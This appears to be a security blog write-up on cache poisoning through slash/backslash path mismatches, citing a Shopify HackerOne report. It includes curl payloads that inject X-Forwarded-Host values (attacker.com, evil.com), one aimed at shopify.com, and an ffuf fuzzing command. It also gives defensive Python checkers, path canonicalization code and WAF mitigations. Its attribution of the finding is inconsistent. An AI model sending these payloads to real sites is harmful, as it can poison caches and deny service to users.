Exploiting Slash/Backslash Mismatch to Trigger Cache Poisoning

This vulnerability, discovered by Bassem Sadaqah, led to a CDN-wide Denial-of-Service (DoS) on Shopify, demonstrating how a simple path normalization inconsistency can cause major disruption even in a mature system.

You Should Know:

1. Cache Poisoning via Path Mismatch

When a CDN and the web server behind it treat mixed slashes (/ vs \) in a URL differently, the cache may key a request as one path while the origin answers for another. An attacker can exploit that disagreement to get the origin's response for a malformed request stored under the cache key of a legitimate one, so ordinary users are then served the poisoned entry.

Example Exploit:

curl -i "https://victim.com/path\to\malicious" -H "Host: victim.com" -H "X-Forwarded-Host: attacker.com"

2. Testing for Path Normalization Flaws

Use these commands to check if a server normalizes paths inconsistently:

Linux/Windows Test:

curl -I "https://target.com/path\to\test" 
curl -I "https://target.com/path/to/test" 

Compare responses for discrepancies.
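The comparison step above is easy to do by eye for two responses but tedious across many paths, so here is a small checker, written for this page as an added example rather than taken from the report or from any tool it names. It takes the raw header blocks that `curl -I` prints for the slash and backslash variants of one path (the two responses embedded below are constructed samples, not captured from any real site), lists every status or cache-relevant header that differs, and flags the case a defender cares about: the backslash variant gets a different answer and that answer is cacheable.

```python
"""Compare the slash and backslash variants of the same path (added example)."""

# Constructed sample responses standing in for the output of the two curl -I
# calls above: the slash variant is the real page, the backslash variant got a
# different, yet cacheable, answer from the edge.
SLASH_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Cache-Control: public, max-age=600\r\n"
    "Content-Length: 4096\r\n"
    "Age: 0\r\n"
    "X-Cache: MISS\r\n"
    "\r\n"
)
BACKSLASH_RESPONSE = (
    "HTTP/1.1 404 Not Found\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Cache-Control: public, max-age=600\r\n"
    "Content-Length: 512\r\n"
    "Age: 37\r\n"
    "X-Cache: HIT\r\n"
    "\r\n"
)

# Headers whose values should agree if edge and origin treat both paths alike.
COMPARED_HEADERS = ("content-type", "content-length", "cache-control",
                    "location", "vary", "x-cache")


def parse_head(raw: str):
    """Return (status_code, {lowercased-name: value}) from a raw HTTP head."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [line for line in head.split("\n") if line.strip()]
    status = int(lines[0].split()[1])          # "HTTP/1.1 404 Not Found" -> 404
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def is_cacheable(headers) -> bool:
    """Rough reading of Cache-Control: may a shared cache store this response?"""
    cc = headers.get("cache-control", "").lower()
    if "no-store" in cc or "private" in cc:
        return False
    return any(token in cc for token in ("public", "max-age", "s-maxage"))


def diff_variants(slash_raw: str, backslash_raw: str):
    """List (field, slash_value, backslash_value) for every field that differs."""
    s_status, s_hdr = parse_head(slash_raw)
    b_status, b_hdr = parse_head(backslash_raw)
    diffs = []
    if s_status != b_status:
        diffs.append(("status", str(s_status), str(b_status)))
    for name in COMPARED_HEADERS:
        if s_hdr.get(name) != b_hdr.get(name):
            diffs.append((name, s_hdr.get(name), b_hdr.get(name)))
    return diffs


def assess(slash_raw: str, backslash_raw: str) -> str:
    """Classify the pair as 'consistent', 'inconsistent', or
    'inconsistent-cacheable' (the differing answer is also being stored by a
    shared cache, which is the precondition for the poisoning described above)."""
    diffs = diff_variants(slash_raw, backslash_raw)
    if not diffs:
        return "consistent"
    _, b_hdr = parse_head(backslash_raw)
    body_differs = any(field in ("status", "content-length", "location")
                       for field, _, _ in diffs)
    if body_differs and is_cacheable(b_hdr):
        return "inconsistent-cacheable"
    return "inconsistent"


if __name__ == "__main__":
    for field, a, b in diff_variants(SLASH_RESPONSE, BACKSLASH_RESPONSE):
        print(f"{field:15} slash={a!r:25} backslash={b!r}")
    print("verdict:", assess(SLASH_RESPONSE, BACKSLASH_RESPONSE))
```

On the constructed pair the checker reports the status, Content-Length and X-Cache differences and returns `inconsistent-cacheable`; a site whose edge and origin agree on both spellings returns `consistent`, which is what you want to see for every path you own.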

3. CDN Cache Poisoning Payloads

Inject malicious headers to hijack cached responses:

curl -i "https://shopify.com/\admin" -H "X-Forwarded-Host: evil.com" 

4. Automated Scanning with ffuf

Use tools like `ffuf` to fuzz path variations:

ffuf -w slashes.txt -u "https://target.com/FUZZ" -H "Host: target.com" 

Where `slashes.txt` contains:

path/to/test 
path\to\test 
path\/to\/test 

5. Mitigation Steps

  • For Developers: Normalize paths server-side before processing.
  • For Admins: Configure CDNs (Cloudflare, Akamai) to reject mixed slashes.
  • WAF Rules: Block requests with backslashes (\) in URLs.
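The three mitigation bullets come down to one rule: the origin and the cache must agree on a single canonical form of every path before either of them acts on it. The function below is an added illustration of that rule written for this page, not code from Shopify, the report, or any CDN. It decodes percent-encoding exactly once, rejects backslashes by default (the WAF-rule option) or folds them into slashes (the normalize option), collapses duplicate slashes and dot segments, and then derives the cache key from the canonical path and the authoritative `Host` only, so client-controlled headers such as `X-Forwarded-Host` never influence what gets stored. The `policy` parameter and the key format are assumptions made for the example.

```python
"""Server-side path canonicalization shared by origin and cache key (added example)."""
import posixpath
import re
from urllib.parse import unquote


def canonical_path(raw_path: str, policy: str = "reject"):
    """Return one canonical form of a request path, or None to reject it.

    policy="reject": any backslash, literal or %5C-encoded, fails the request
                     (the WAF-rule mitigation above).
    policy="fold":   backslashes are treated as slashes, so every spelling of
                     the same resource maps to the same canonical form.
    """
    # Decode percent-encoding exactly once. A second decode would turn %255C
    # into a backslash after the check below has already run.
    # (Note: %2F decodes to "/" here and thus merges segments; keep it encoded
    # if your application distinguishes the two.)
    decoded = unquote(raw_path)
    if "\0" in decoded or not decoded.startswith("/"):
        return None
    if "\\" in decoded:
        if policy != "fold":
            return None
        decoded = decoded.replace("\\", "/")
    collapsed = re.sub(r"/+", "/", decoded)       # //admin -> /admin
    normalized = posixpath.normpath(collapsed)    # /a/./b/../c -> /a/c
    if not normalized.startswith("/"):
        return None
    return normalized                             # trailing slash is dropped


def cache_key(method: str, host: str, raw_path: str, policy: str = "reject"):
    """Build the key a shared cache stores under. Only the canonical path and
    the authoritative Host take part; X-Forwarded-Host and other client-set
    headers must never reach the key or the cached body. Returns None when the
    path is rejected, so nothing is cached for it at all."""
    path = canonical_path(raw_path, policy)
    if path is None:
        return None
    return f"{method.upper()} {host.lower()}{path}"


if __name__ == "__main__":
    # The three spellings from slashes.txt above, under each policy.
    for spelling in ("/path/to/test", "/path\\to\\test", "/path\\/to\\/test"):
        print(f"{spelling!r:22} reject -> {canonical_path(spelling)!r:18}"
              f" fold -> {canonical_path(spelling, policy='fold')!r}")
```

Under `reject`, only `/path/to/test` survives and the other two spellings never produce a cache entry; under `fold`, all three canonicalize to `/path/to/test` and therefore share one key, which is exactly the agreement between edge and origin that the mismatch exploited. Whichever policy you pick, apply the same function at the CDN and at the origin.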

What Undercode Say

Cache poisoning via slash/backslash mismatch is a low-hanging fruit for attackers targeting high-traffic platforms. Always:

1. Test path normalization during penetration testing.

2. Monitor cache headers (`Age`, `X-Cache`).

3. Use tools like Burp Suite to automate detection.

Relevant Commands:

# Check cache status (-E so the | alternation is understood by grep)
curl -I "https://target.com" | grep -iE "cache|age"

# Force cache bypass with a unique query string
curl "https://target.com?bypass=$(date +%s)"

Expected Output:

A CDN serving poisoned content to users due to inconsistent path handling, leading to DoS or data leakage.

Prediction

As CDNs grow more complex, similar normalization flaws will emerge in edge-case routing logic, making this a persistent threat.

Reference:

Shopify HackerOne Report

Reported By: 0xacb Shopify – Hackers Feeds
